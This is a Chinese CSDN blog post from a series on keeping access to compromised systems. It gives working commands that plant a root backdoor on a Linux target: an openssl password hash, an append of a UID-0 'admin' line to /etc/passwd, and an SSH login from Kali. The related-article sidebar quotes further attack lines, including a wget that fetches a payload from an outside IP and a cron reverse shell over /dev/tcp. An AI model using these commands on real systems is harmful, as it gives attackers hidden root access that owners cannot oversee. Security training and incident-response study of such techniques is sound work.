操作系统权限维持(九)之Linux系统-添加用户后门

最新推荐文章于 2024-08-08 09:22:19 发布
最新推荐文章于 2024-08-08 09:22:19 发布
阅读量467 收藏 3
点赞数 2
分类专栏: 操作系统权限维持 文章标签: linux 服务器 网络安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129790241
版权
该系列文章详细介绍了在Windows和Linux操作系统中如何通过各种方法维持后门权限,包括使用粘贴键、克隆账号、启动项、计划任务、系统服务、定时任务、SUID权限以及SSHKey等手段。还涉及到加密算法如MD5来设置用户密码,并演示了如何在目标服务器上添加具有管理员权限的用户。
摘要由CSDN通过智能技术生成
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门

添加用户后门

添加用户

生成密码: openssl passwd -1 -salt admin 123456 
-1 的意思是使用md5crypt加密算法 
-salt 指定盐为admin 
123456 明文密码

在这里插入图片描述

追加命令(UID=0):

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /etc/passwd

在这里插入图片描述

现在用户被添加到了目标服务器的/etc/passwd文件中,我们使用kali机器去连接admin这个用户作为后门

ssh admin@192.168.52.132

在这里插入图片描述

怰月
关注
专栏目录
linux创建后门账户,Linux后门
weixin_34580441的博客
05-14 696
利用系统若口令,插入任务计划,生成后门wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O mlfobcehttp://119.9.106.27:8000/i.sh-----------------------------------------------------------i.sh-----------------...
LINUX后门--教程(一)—— 增加超级用户帐号
W小哥
06-01 4414
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、增加超级用户帐号-教程 **前提条件:**假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 2.1 第一种情况:可以交互且允许uid=0的用户远程登录 增加超级用户账号命令: echo "cshm:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号 passwd cshm #修改cshm的密码为cs
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
weixin_57514792的博客
08-08 652
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
linux添加后门方法,超初级的linux后门制作方法
weixin_39667509的博客
05-10 213
超初级的linux后门制作方法更新时间:2006年10月24日 00:00:00 作者:众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方,然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了一个文件都有一个所有者, 表示该文...
Linux useradd userdel命令
小楼一夜听春雨,深巷明朝卖杏花
03-31 737
Linux 系统中,可以使用useradd 命令新建用户,此命令的基本格式如下: [root@localhost ~]#useradd [选项] 用户名 该命令常用的选项及各自的含义,如表 1 所示。 表 1 useradd命令常用选项 选项 含义 -u UID 手工指定用户的 UID,注意 UID 的范围(不要小于 500)。 -d 主目录 手工指定用户...
浅谈Linux操作系统安全防范策略.pdf
09-06
"浅谈Linux操作系统安全防范策略" Linux操作系统安全防范策略是当前网络安全的一个重要方面。随着网络的不断发展,网络安全是我们应该时刻注意的问题。本文主要从系统启动和登录的安全性、限制网络访问、Linux病毒...
linux权限维持.pdf
03-31
首先,Linux系统权限维持的方法通常涉及隐藏恶意程序、保持后门开放、利用系统配置和利用系统服务等多个方面。 隐藏恶意程序通常意味着攻击者会尝试隐藏其存在的痕迹,以避免被系统管理员发现。这可以通过修改文件...
Linux木马检测技术分析与系统调用权限验证法.pdf
09-07
Linux作为开源操作系统,其源代码开放的特性既赋予了用户高度定制的自由,也为黑客提供了研究系统漏洞的便利,从而导致Linux木马种类繁多,实现方式多样。 根据功能和实现方式,Linux木马可以分为两类:一是通过...
想走后门?没门!--常见后门伪装、检测、防范技巧大揭密:Linux/Unix近期相关漏洞.pdf
09-07
此外,Linux 操作系统中还存在许多其他漏洞,例如 Linux Kernel 的 pktcdvd 和 rawdevice device 块设备组件中的漏洞,攻击者可以利用该漏洞来提升自己权限系统开发和专业指导 在系统开发过程中,开发者需要...
如何保护你的Linux操作系统
01-09
在现在这个世道中,Linux操作系统安全是十分重要的。但是,你得知道怎么干。一个简单反恶意程序软件是远远不够的,你需要采取其它措施来协同工作。那么试试下面这些手段吧。  使用SELinux  SELinux是用来对...
linux后门用法教程
11-27
linux系统攻防教程,文件解压密码:shaoyu,我只是个群里的搬运工,原创是群里的少宇大佬,看了这个后我觉得很有收获,虽然这个技术可能过时了,但是只要掌握了原理,也许你也能创出新的后门方法。
window和linux一句话添加后门,查看公网ip
weixin_50815573的博客
03-30 630
window添加后门 net user 用户名 密码 /add 提权到管理员组 net localgroup administrators 用户名 /add 实例 net user newuser 123456 /add net localgroup administrators newuser /add 这样就添加了一个用户,并且加入到管理员组 用户名:newuser 密码:123456 Linux添加root权限后门 创建root权限后门 useradd -p `openssl
检查linux后门- 笔记
收集盒 Book box
04-20 2141
1.rkhunter 安装 wget http://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.0/rkhunter-1.4.0.tar.gz tar -zxvf rkhunter-1.4.0.tar.gz cd rkhunter-1.4.0 ./installer.sh --install ./rkhunte
Linux权限维持后门及应急响应
weixin_65582330的博客
03-18 1031
/1 * * * * bash -i >& /dev/tcp/192.168.10.130/7777 0>&1 #每一分钟把shell反弹到kali上。进入root根目录,删除和用户相关的文件夹 cd 进入根目录,找到ruoji,然后rm -rf ruoji ,删除文件夹。echo "ruoji:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号。在root根目录下,进入 /var/spool/mail/ 目录下,找到user1相关目录删除。
持久化:利用Linux PAM创建后门
qq_68163788的博客
02-19 1476
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
Linux系统后门技术(隐藏帐户篇)注:已发表在《黑客手册》第6期
yxyhack's blog
09-25 1万+
  Linux系统后门技术(隐藏帐户篇)        每当我们欢天喜地的得到一个linux系统服务器肉鸡时,最大的愿望就是能把它永远留住。当然,永远留住是不可能的,但是我们要尽量的不让它飞走。这就要用到linux后门技术了,这是项复杂的技术,本人水平有限不可能面面俱到,我只希望这一系列文章能为大家提供一点思路,在您hacking的道路上打开一扇方便之门!       言归
linux 系统使用 cymothoa 添加后门
发哥微课堂
01-27 2918
0x00:介绍 cymothoa 是一个后门工具,利用代码 shellcode 会被注入到进程中,只要进程存在,后门就会有效,所以一般选择一些自其服务的进程来注入,例如 web 服务 mysql,apache 等。其后门所拥有的权限和注入的进程权限是相同的。当拿下目标 shell 后就可以使用 cymothoa 添加后门了。 0x01:使用 首先已经有了一个机器的 shell,我这里是 me...
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
操作系统安全:加密、认证与授权
"该资源是关于操作系统安全措施的课件,主要涵盖了加密、认证、授权等关键概念,并提到了开源、后门与软件安全的问题。课程由信息安全研究中心的赵锋教师讲授,包含了计算机硬件和软件的基础知识,以及多本操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值